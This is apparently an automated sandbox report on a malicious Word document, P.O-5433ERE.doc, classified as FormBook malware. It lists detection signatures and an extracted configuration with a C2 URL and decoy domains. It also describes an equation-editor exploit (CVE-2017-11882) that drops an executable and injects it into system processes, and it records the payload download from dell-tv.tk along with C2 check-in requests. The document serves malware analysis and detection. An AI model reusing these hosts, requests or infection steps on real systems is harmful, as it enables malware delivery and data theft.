Windows Analysis Report P.O-5433ERE.doc

Overview

General Information

Sample Name: P.O-5433ERE.doc
Analysis ID: 528734
MD5: 17ca06000e92058f0d43259b2683537c
SHA1: db453e5125310d209fe04fb0211677d79d25f3ee
SHA256: 3c9280552a4129fdf884414b080c80d5ffc72403079d7a5292e9b09d832ab37d
Tags: doc

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.fcusd4.com/op9t/"], "decoy": ["tzjwt261888.com", "top10iecasinos.com", "nurotag.com", "controlparental24.com", "truenettnpasumo1.xyz", "finsits.com", "publicfigure.skin", "natalispharma.com", "brixbol.com", "bal.group", "perfectinteractivemedia.com", "fascialboost.com", "jgcpfb120.com", "grizzlysolutionsllc.net", "wearegardenersusa.com", "rjsarka.com", "shintoku-gsfarm.com", "1oavyx.com", "volunteervabetweenk.com", "tdshawn.com", "bandhancustomer.com", "amyzingskin.com", "sorbetsa.com", "eadbrasil.club", "directnaukri.com", "alltheheads.com", "elbbinandnibble.online", "kaizenswinger.com", "kimberleydawnwallace.com", "zscyyds.xyz", "ecranthermique.com", "mystitched.com", "shophallows.com", "cachondearais.xyz", "flavatdvb.quest", "christendombiblecollege.com", "affordalbehousing.com", "engro-connect.com", "lorticepttoyof2.xyz", "kingslot.bet", "wiseriq.com", "emmaraducanu.tennis", "xn--seebhnegrlitz-pmb9f.com", "perfectstudio.net", "thenewera.icu", "com104940689794.icu", "imaginative-coaching.com", "campdiscount.info", "waggledance.net", "excellglobus.com", "fssqyd.com", "yalesi.net", "aoliutech.com", "replenish.place", "nityammed.com", "stanislauscountyedu.info", "029saxjy.com", "lttcp089.com", "texaszephyr.com", "sloanlakecomedy.com", "axonlang.com", "bhutaan.com", "sevensummitclimbing.com", "wolfenhawk.com"]}
Yara detected FormBook
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Antivirus or Machine Learning detection for unpacked file
Source: 5.0.ashlkyvc7592.exe.400000.10.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.ashlkyvc7592.exe.400000.8.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.ashlkyvc7592.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.ashlkyvc7592.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
Document contains Microsoft Equation 3.0 OLE entries
Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr Stream path '_1699368849/\x1CompObj' : ...........................F....Microsoft Equation
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: ashlkyvc7592.exe, ashlkyvc7592.exe, 00000005.00000003.424164499.00000000007B0000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000003.425110861.0000000000910000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.462140612.0000000000C20000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, cmstp.exe, 00000007.00000003.462746039.0000000001E70000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000003.461709967.00000000004F0000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000002.686830161.0000000002180000.00000040.00000001.sdmp
Source: Binary string: cmstp.pdb source: ashlkyvc7592.exe, 00000005.00000002.461894500.00000000006D9000.00000004.00000020.sdmp, ashlkyvc7592.exe, 00000005.00000002.461761536.00000000003E0000.00000040.00020000.sdmp

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: dell-tv.tk
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 4x nop then pop edi 5_2_0041566A
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 4x nop then pop esi 5_2_004157F9
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4x nop then pop edi 7_2_000A566A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4x nop then pop esi 7_2_000A57F9
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 37.0.9.166:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 37.0.9.166:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 144.91.75.9:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 144.91.75.9:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 144.91.75.9:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.texaszephyr.com
Source: C:\Windows\explorer.exe Domain query: www.bandhancustomer.com
Source: C:\Windows\explorer.exe Domain query: www.publicfigure.skin
Source: C:\Windows\explorer.exe Network Connect: 172.67.184.102 80
Source: C:\Windows\explorer.exe Domain query: www.volunteervabetweenk.com
Source: C:\Windows\explorer.exe Domain query: www.1oavyx.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.fcusd4.com/op9t/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: WKD-ASIE WKD-ASIE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== HTTP/1.1Host: www.texaszephyr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F HTTP/1.1Host: www.publicfigure.skinConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== HTTP/1.1Host: www.volunteervabetweenk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 37.0.9.166 37.0.9.166
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 25 Nov 2021 17:08:39 GMTContent-Type: application/x-msdownloadContent-Length: 560128Last-Modified: Thu, 25 Nov 2021 01:30:41 GMTConnection: keep-aliveETag: "619ee741-88c00"Accept-Ranges: bytes
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /ashlyzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: dell-tv.tkConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 17:10:32 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be75c-113"Via: 1.1 googleConnection: close Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 17:10:37 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be75c-113"Via: 1.1 googleConnection: close Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Nov 2021 17:10:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingcache-control: no-cacheCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E%2BS9g0CLJW2CTVsxvlIjpGyQWc73vohHYhkK3DVTZy%2F85cz2tAKSxAl6hkRn4vGBjwJew1vfLxOKQGCx0JpcyX%2F5maQz5OwqFwHVCEGtmJNlPxIG7g0A%2BpMGv5y1Y30TbEd2CWDFg703UHV4AnI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6b3c7df37c1c4230-AMSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.439681149.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.442701106.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.466348639.0000000001BD0000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico95
Source: explorer.exe, 00000006.00000000.451072374.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443806201.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438482081.000000000844F000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.453053501.000000000844F000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icoICROS~4.LNK
Source: explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.439681149.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp0
Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-de/?ocid=iehpC
Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.450661443.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438489061.000000000845A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443564000.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.446213289.0000000008426000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432704474.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450764826.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432948850.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443456223.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.450661443.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438489061.000000000845A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.446213289.0000000008426000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432704474.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443456223.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.442612766.0000000003DF8000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000006.00000000.451072374.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.516156334.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443806201.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1301DF5A-9B1F-4290-90EE-2E8BF9838615}.tmp
Source: unknown DNS traffic detected: queries for: dell-tv.tk
Source: global traffic HTTP traffic detected: GET /ashlyzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: dell-tv.tkConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== HTTP/1.1Host: www.texaszephyr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F HTTP/1.1Host: www.publicfigure.skinConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== HTTP/1.1Host: www.volunteervabetweenk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY

System Summary:

